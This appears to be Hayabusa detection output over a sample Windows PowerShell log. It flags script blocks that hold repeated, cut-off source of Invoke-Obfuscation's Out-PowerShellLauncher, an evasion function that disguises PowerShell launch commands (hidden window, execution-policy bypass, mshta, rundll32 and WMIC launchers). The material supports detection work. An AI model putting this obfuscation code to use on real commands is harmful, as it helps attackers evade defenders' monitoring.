Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. 
$ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. 
Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. 
.EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. 
$ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. 
For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. 
If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). 
If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. 
# This is to pr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
